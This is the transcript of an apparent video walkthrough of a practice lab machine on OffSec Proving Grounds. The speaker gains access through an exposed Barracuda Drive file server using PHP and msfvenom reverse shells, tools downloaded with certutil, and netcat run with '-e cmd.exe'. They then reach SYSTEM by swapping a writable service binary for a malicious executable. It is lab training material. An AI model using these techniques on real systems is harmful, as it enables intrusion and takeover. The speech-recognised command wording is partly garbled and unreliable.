Hi everyone, good morning. Mm, I'm alive? Yes, perfect. So, um, today I come back to offensive security proving grounds. I'm going to perform an access to Medjed machine and privilege escalation. It's a Windows machine. It's my first Windows machine at offensive security, and I hope that you learn and enjoy, of course. So the first one is review the access to the target server is perfect. This directory with the name of the machine, we are going to create an directories with names nmap, scripts, data, and exploits. So inside of nmap, um, we are going to perform. So let me show you this at user bin. This is my nmap tool. Using a couple of instruction at nmap. So nmap. The first one, obtain the ports open so quickly, and the second one, execute a filter over the ports and review his common scripts and common version this port, and the output was to the target nmap. So during this process, we can perform an scan port that show us the open ports at the target system. As you can see, there are many ports opens. For example, this one um, at port 8000 is a web application. So homepage set email say set administrator account. So Barracuda Drive is inaccessible until you set administrator account. Please enter a username, password, and set administration button. So Fonsi at email.com, username admin, password admin 1234, and admin 1234. Don't save and continue. Notice you have enabled password recovery username. Use an SMTP service, so it's need configure at this server. So in web file server, uh, it's able to find the file system of the operative system. At C, this is same that is the file system user. So inside of grun, we can go to the desktop and found the local machine flag. This is the user flag. I don't know if the administrator is able to show to inside of desktop. Yeah, desktop ini proof txt. So this is the second flag. let me uh, let me use it. So unbelievable, but okay, congratulations. But we want to access and perform a privilege escalation. So here we can work with the operative system. So this is 8000 port. So we need to upload a kind of shell or a kind of service or a kind of file that allow us access to the operative system. So inside of SAM, that is a web server framework, HTTP we can find this one. So who is this? It's a Git application inside of this. Maybe this application is in another host or another port. So fingerprinting, open this port, generate bad request, SSL, HTTP. This one is another HTTP and this one is another HTTP. So more quickly is to cat target nmap open, and inside of open we can filter by HTTP. So this is the Barracuda open port. These others, let me copy this one here. The other ports are, for example, 45332. This one, yeah, is the same application that we found here. So start, next. This is something not important, but the most important thing at the if we include here a file, for example, so let me check it. Nmap cd data cd data echo test to test.html. Is better move test HTML to test.php. We can have a problem with the mouse. Oh. All the directs I have a problem. I don't know why. This is something that I don't understand. So it's working now. Inside of offensive security, inside of the matching with Medjed, inside of data, test PHP, an upload file, and test PHP is uploaded success, but we need call it from here test.php. Yeah, perfect. So at this point we can create payload with MSF Venom. So exploits history pipe grep Venom. So with PHP, because this server only can execute PHP source code, we are going to create a payload for Windows. With my my attacker IP, if config, uh, if config, if conf, oh my god, um, this one, um, local port could be 4043. Here we are going to upload another file with the name Medjed exploits reverse. Yeah, is this one? Reverse.php. Upload. Right now we can split netcat this port for the reverse.php. So who am I? Medjed 0. This is perfect because we are inside of the operative system info provide us the configuration of the operative system, and the version is a Microsoft Windows 10 Pro. So perfect. In that point I want to use a WinPiece exec locate WinPiece exec like this. For the privilege escalation, this is exploits and scripts cp at this place. Let me create a Python 3 -m HTTP server, so we can use third util minus split no, minus URL cache. Whoa, what happened? So third util un reconoce lo interno external third util dot exe. Perfect. Right now third util dot exe minus URL cache minus f minus split minus f http what is my IP if config this one here the port 9090 winps.exe to this place. So URL cache not exist. Okay, it's possible that is with one slash and the name of winps is winps.exe. Oh, and space. So right now successfully So there, and inside of this place we have winps.exe. So with winps.exe we can execute the software for review the privilege escalation. So during this executing process, we are going to try to do another thing because I dislike this terminal. So this is executed. Let me see php get command cmd exam php. So let me check. Yes. For example, we can use bin remote command execution.php, put inside this one. So cmd echo cmd. So perfect. Right now we can upload the here the Kali this one upload file. So with this point here we can use c.php at the value of cmd we can ask who am I. Perfect. So at this point, if we upload for example locate netcat.exec 64 for example we can split here and say cp this one to this place. Right now upload offensive security the machine is Medjed, and inside of scripts we can upload the netcat.exec is perfect. So at the same directory I want to perform netcat64.exec my attacker IP. What is my attacker IP? If config and this is let me see CE netcat.php, and yeah, this is netcat64.exec, my attacker IP, that is this one, and the port that I want to listen, for example, the 4043, and -e cmd.exe. This is my instruction, but it's probably don't work fine because should be encoded at URL. So let me close it, and listen here at the port 4043. We try to connect like this. Yeah, it's work perfect. So who am I? Jiren. This terminal is better. Dear winps.exec. So winps.exe. So there are after review there are vulnerable version of Barracuda. Privilege escalation at Windows. So there are a directory. Let me show you. Permission to write. C-Shamp, Windows tags, uses to current. Let me see. Yes, this one. Authenticated user can execute inside of this database folder that belongs to Barracuda service. So we can write inside, and we can create files. So as you can see in the directory of Barracuda file system, inside of BD there are many things that we can upload and modify. So one of them is this one, and this one is the binary of the Barracuda local execution service. So this is a local privilege escalation proof of concept that the most important thing on this at this place, low priv, fine string, user known, global group member. Who am I? Is this user? Yeah. And say move this service to this name, and create a malicious binary on Kali Linux that contains a new service log on with administrator. So my is too simple. The service when reboot execute this binary and we can modify it. So we don't need follow this one. So it's possible to history history pipe grep msf venom. So history pipe grep msf venom history, yeah, history pipe grep msf venom. This one is right. We need to create a shell for this Windows machine. So this one could be nice, but we need to change the attacker IP and use our attacker IP instead of this one. This could be shell1.exec, and we are going to perform the same payload but with x64 shell reverse TCP with name 2. Sorry. It's perfect. Shell 1. So we need to create again the shell 1 because it's not created. At this point we can go to cdc vd and there, and here we can use again third util. So for example PowerShell wget http. The attacker IP is this one. Yes, and the port 9090. Let me see, Python 3, this one. Shell1.exec, and the out could be shell1.exe. Yes, if we dare, it's possible maybe netcat 4443 is listening, and if I execute the shell1.exec, yeah, who am I? Yeah, sorry. Here we found who am I. Perfect. So exit. With this one could be valid by load. So we need modify move, for example, vd.exec to vd service.exec. Move vd.exec to vd service.exe. Right now we are going to move the shell1.exec to vd.exe. Move shell1.exe to vd.exe. Perfect. Right now we only need to shut down reboot. this is shut down, uh, reboot the operative system, shut down, shut down minus reboot, and wait on our attacker machine for the remote remote shell with the high level of user privilege account. Yeah, my first reverse shell was die. Um, this is because the operating system is rebooting. If all work fine, we are going to obtain an entry reversal on my attacker machine. Yeah. So who here? This is who am I? NT authority system and system info. This is perfect. So right now we can go to CDC administrator, desktop. So CDC users administrator. So cd desktop dir, and this is the proof txt proof.txt. That is perfect, and this is all for this machine. I hope that you learn. From my point of view, is more easy than it seems. So you only need to go to the right attack vector. We continue in the next video.